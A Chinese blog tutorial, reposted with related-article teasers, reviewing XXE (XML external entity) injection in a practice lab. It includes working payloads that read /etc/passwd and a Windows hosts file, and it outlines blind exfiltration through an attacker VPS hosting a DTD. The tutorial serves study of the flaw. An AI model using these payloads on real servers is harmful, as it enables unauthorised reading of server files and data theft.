XXE漏洞复习版本

摘要:
昨天,我回顾了很久以前看到的XXE、SSRF、../../目录遍历中的漏洞,并阅读了许多新内容。XXE原则第一部分:XML声明部分?如果接口支持接收xml数据,并且没有对xml数据采取任何安全措施,则可能会导致XXE漏洞。当应用程序解析XML输入并且不禁止加载外部实体时,会出现XXE漏洞,从而导致攻击者能够构造恶意XML。XXE使用方法1。如果有echo,可以直接在请求包帖子中使用。XXE搜索方法是1。服务是xfire。2.显而易见的xml是内容输入点。
题记

昨天把很久之前看的XXE、SSRF、../../目录遍历什么的漏洞详细复习了一遍,又读出来不少新东西。来不及了,我们不能把时间浪费在迷茫上。

这次先整理XXE。XXE,外部传入的XML代码。

本来整理一半放弃了,我觉得人家写的挺好的,自己也理解了,看人家的就行,后来又觉得自己重新整一遍才好,过一遍脑子。

XXE介绍

"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题",也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。

现在很多语言里面对应的解析xml的函数默认是禁止解析外部实体内容的,从而也就直接避免了这个漏洞。以PHP为例,在PHP里面解析xml用的是libxml,其在≥2.9.0的版本中,默认是禁止解析xml外部实体内容的。

XXE原理

第一部分:XML声明部分

<?xml version="1.0"?>

第二部分:文档类型定义 DTD

<!DOCTYPE note[

<!--定义此文档是note类型的文档-->

<!ENTITY entity-name SYSTEM "URI/URL">

<!--外部实体声明-->
]]]>

第三部分:文档元素

<note>

<to>Dave</to>

<from>Tom</from>

<head>Reminder</head>

<body>You are a good man</body>

</note>

DTD(Document Type Definition,文档类型定义),用来为 XML 文档定义语法约束,可以是内部申明也可以使引用外部。

DTD现在很多语言里面对应的解析xml的函数默认是禁止解析外部实体内容的,从而也就直接避免了这个漏洞。

内部申明DTD格式

<!DOCTYPE 根元素 [元素申明]>

外部引用DTD格式

<!DOCTYPE 根元素 SYSTEM "外部DTD的URI">

引用公共DTD格式

<!DOCTYPE 根元素 PUBLIC "DTD标识名" "公共DTD的URI">

外部实体引用 Payload

<?xml version="1.0"?>

<!DOCTYPE ANY[

<!ENTITY f SYSTEM "file:///etc/passwd">
]>

<x>&f;</x>

外部引用可以支持http,file,ftp等协议。

如果一个接口支持接收xml数据,且没有对xml数据做任何安全上的措施,就可能导致XXE漏洞。

simplexml_load_string()

函数转换形式良好的XML 字符串为 SimpleXMLElement 对象。

在PHP 里面解析 xml 用的是 libxml, 其在 2.9.0 的版本中 默认是禁止解析 xml 外部实体内容的。

XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致攻击者可以构造一个恶意的XML。

Xml提交的时候页面可直接提交,数据包中需要进行编码处理。

XXE利用方法

1、有回显的

直接在请求包post利用即可。

2、无回显的

申请一个vps,vps定义DTD,利用XXE引入外部DTD,vps监听端口获取内容。

XXE漏洞复习版本第1张

XXE漏洞复习版本第2张

XXE漏洞复习版本第3张

XXE漏洞复习版本第4张

XXE漏洞复习版本第5张

XXE漏洞复习版本第6张

XXE查找方法

1、service为xfire的

2、明显的xml为内容输入点的。

3、以json格式的request。

XXE靶场利用

1、进入靶场,随便输入,回显为

XXE漏洞复习版本第7张

2、构造一个payload,

<?xml version = "1.0"?>

<!DOCTYPE note [

<!ENTITY hack "chongchongchong">
]>

<name>hack</name>

回显为

XXE漏洞复习版本第8张

3、构造一个恶意的payload,通过外部实体引用从而去获取后台服务器的本地文件信息

(注:外部引用可以支持http,file,ftp等协议。)

payload

<?xml version = "1.0"?>

<!DOCTYPE ANY [

<!ENTITY f SYSTEM "file:///C://Windows/System32/drivers/etc/hosts"> <!--要根据后台服务器的系统,输入正确的文件路径-->
]>

<x>&f;</x>

回显为

XXE漏洞复习版本第9张

4、我们可以在C盘创建一个txt文件

XXE漏洞复习版本第10张

路径为

C:XXE.txt

5、构造payload

<?xml version = "1.0"?>

<!DOCTYPE ANY [

<!ENTITY f SYSTEM "file:///C://XXE.txt">
]>

<name>&f;</name>

XXE漏洞复习版本第11张

XXE防御方式

XXE漏洞复习版本第12张

参考链接

http://cnblogs.com/sunny11/p/13617128.html#_label1

http://cnblogs.com/sunny11/p/13617136.html

http://cnblogs.com/3cH0-Nu1L/p/13428366.html

免责声明:文章转载自《XXE漏洞复习版本》仅用于学习参考。如对内容有疑问,请及时联系本站处理。

上篇华为海思系列芯片开发学习中常见缩写详解使用Unity3D生成网格并加贴图下篇

宿迁高防,2C2G15M,22元/月;香港BGP,2C5G5M,25元/月 雨云优惠码:MjYwNzM=

相关文章

【环境巡检】使用jmeter+ant+Jenkins+企业微信自动化巡检_ant调用jmeter脚本并生成报告(2)

 一、分析准备  接上文,目前jmeter、jdk等已经准备完成。本文从安装ant及配置相关jmeter配置说起。 二、ant调用jmeter生成报告 1)、安装ant 1、安装包下载 下载地址 http://ant.apache.org/bindownload.cgi,下载后解压到指定位置即可   2、配置环境变量       ANT_HOME 为 a...

2017年最受欢迎的十大开源黑客工具

八 戒推荐一 【黑客】cracer入侵入门到精通视频教程 刚刚过去的2017年,对于大多数信息安全从业人员来说是无话可说的一年,充斥各种狗血的开脑洞的剧情,可以出问题的地方全部都出了问题,从MongoDB数据库、到WiFi安全协议、英特尔处理器漏洞、到NSA的超级武器包、僵尸摄像头、会挖矿的海盗湾、邻居胖子发明的想哭勒索病毒…万幸的是,下半场黑客实在扛不住...

EMQ X+TDengine 搭建 MQTT 物联网可视化平台

物联网数据采集涉及到大量设备接入、海量的时序数据传输,EMQ X MQTT 服务器 与 TDengine 大数据平台的组合技术栈完全能够胜任场景中的海量时间序列监测数据的传输、存储和计算。 数据入库后,往往需要其他方式如数据可视化系统将数据按照规则统计、展现出来,实现数据的监控、指标统计等业务需求,以便充分发挥数据的价值,TDengine 搭配开源软件 G...

Tomcat学习总结(2)——Tomcat使用详解

一、Tomcat服务器端口的配置 Tomcat的所有配置都放在conf文件夹之中,里面的server.xml文件是配置的核心文件。 如果想修改Tomcat服务器的启动端口,则可以在server.xml配置文件中的Connector节点进行的端口修改 例如:将Tomcat服务器的启动端口由默认的8080改成8081端口 Tomcat服务器启动端口默认配置 1...

微信公众平台开发教程(二) 基本原理及消息接口

微信公众平台开发教程(二) 基本原理及消息接口 一、基本原理 在开始做之前,大家可能对这个很感兴趣,但是又比较茫然。是不是很复杂?很难学啊? 其实恰恰相反,很简单。为了打消大家的顾虑,先简单介绍了微信公众平台的基本原理。 微信服务器就相当于一个转发服务器,终端(手机、Pad等)发起请求至微信服务器,微信服务器,然后将请求转发给自定义服务(这就里就是我们的具...

文件下载及web文件的contentType类型大全

String filePath=""; File file=new File(filePath); //解决乱码问题 String filename=URLEncoder.encode(file.getName(),"utf-8"); //重置输出流 response.reset(); Response.AddHeader("Content-Disposi...